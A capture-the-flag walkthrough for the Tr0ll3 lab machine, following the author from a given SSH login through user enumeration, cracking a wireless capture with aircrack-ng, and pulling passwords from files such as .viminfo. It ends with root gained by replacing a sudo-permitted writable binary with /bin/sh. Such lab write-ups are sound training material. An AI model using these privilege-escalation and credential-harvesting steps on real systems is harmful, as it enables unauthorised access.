The Tr0ll is back with the 3rd machine in the series!
start with credentials in plaintext
The start is atypical..the machine only has the SSH port open, and in the author description we are told to start:here for the login..so let’s try to SSH with these credentials. It works and we are in right away.
12
start@Tr0ll3:~$ ls
bluepill redpill
If you take the bluepill, you are being taught the secrets of how to make a hacker waste time.
Jumping straight into enumeration with LinEnum, we notice there are many potentially interesting users on the system:
1234
maleus
wytshadow
genphlux
eagle
When searching for world writable files, we find the following:
123
-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 49962 Aug 2 00:23 /var/log/.dist-manage/wytshadow.cap
-rwxrwxrwx 1 eagle russ 35737600 Aug 2 00:24 /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
We also find possible credentials for the eagle user among the files owned by the start user:
I transferred the capture file to my machine, also checked the contents of that troll file, it was filled with blocks of strings like these:
123
QBu4rIhKXJ
DKbpcZQpO3
T7JUfO0jjZ
Before looking at the exfiltrated file, I switched to the user eagle with the above password.
Be the eagle – wireless traffic cracking
The packet capture file contains wireless traffic, so I thought about cracking it with aircrack-ng. For the first attempt, I fed it the gold_star.txt file as wordlist, and it found the passphrase in 5 minutes:
There was nothing particularly interesting from eagle’s point of view, other than the sudo privilege for starting the vsftpd service:
12
User eagle may run the following commands on Tr0ll3:
(root) /usr/sbin/service vsftpd start
We keep this option on the bench for now, since we have something else to work with. We know there’s a wytshadow user, and the .cap file had the same name, so I used the key as password for this account and new user, new shell!
wytshadow and the Lynx
Inside the home directory we find a SUID executable:
123
-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun
wytshadow@Tr0ll3:~$ file oohfun
oohfun: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=309f4fec949b0e2eb3f6ec83ccadff89c553e397, not stripped
If we run it, we see the string “iM Cr@zY L1k3 AAA LYNX” printed continuously on the screen. If we look in the strings of the file, we see a reference to a shell script:
1
/lol/bin/run.sh -b 0.0.0.0
If we look at that file, we see it does exactly what we saw earlier, printing the string in an infinite loop:
I was curious about what was inside /lol, it appears to be a JBoss installation:
12
genphlux@Tr0ll3:/lol$ ls
bin client common copyright.txt docs jar-versions.xml JBossORG-EULA.txt lgpl.html lib readme.html server
genphlux can also start an Apache server:
12
User genphlux may run the following commands on Tr0ll3:
(root) /usr/sbin/service apache2 start
I started the server, also getting a 403 Forbidden, lynx or not. Moving on for now, I SSH’ed in as maleus with the found private key.
maleus – don’t even bother
Inside his home we find another binary:
12
maleus@Tr0ll3:~$ file dont_even_bother
dont_even_bother: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=455a77b2503f19c1a09cbc9b66d513b2fa3af73c, not stripped
This binary asks for a password:
123456
maleus@Tr0ll3:~$ ./dont_even_bother
Enter the password :
das
Wrong Password
And in the strings we find a message for finding the correct password probably:
1
Your reward is just knowing you did it! :-P
This reward isn’t really that enticing, so I didn’t jump into reversing this, it might be a troll dead end. I continued looking through the home folder and found a possible password inside the .viminfo file:
1234567
# Registers:
""1 LINE 0
passwd
"2 LINE 0
B^slc8I$
"3 LINE 0
passswd
The password belongs to maleus and now we can check his sudo privileges. We find out he can run the executable from earlier as root:
12
User maleus may run the following commands on Tr0ll3:
(root) /home/maleus/dont_even_bother
From the strings, we already assume the executable itself is just a troll. However, maleus has write privileges over this file:
123
maleus@Tr0ll3:~$ ls -l
total 12
-rwxrwxr-x 1 maleus maleus 8674 Jun 18 2015 dont_even_bother
So we can just replace this useless binary with one that would give us a root shell:
1234567891011
maleus@Tr0ll3:~$ cat /bin/sh > dont_even_bother
maleus@Tr0ll3:~$ sudo ./dont_even_bother
[sudo] password for maleus:
# cat /root/flag.txt
You are truly a Jedi!
Twitter Proof:
Pr00fThatTh3L33tHax0rG0tTheFl@g!!
@Maleus21
This was another fun machine in the series. In the end, we trolled the troll again!
12345678910
________________________________________
/ QOTD: \
| |
\ All I want is more than my fair share. /
----------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||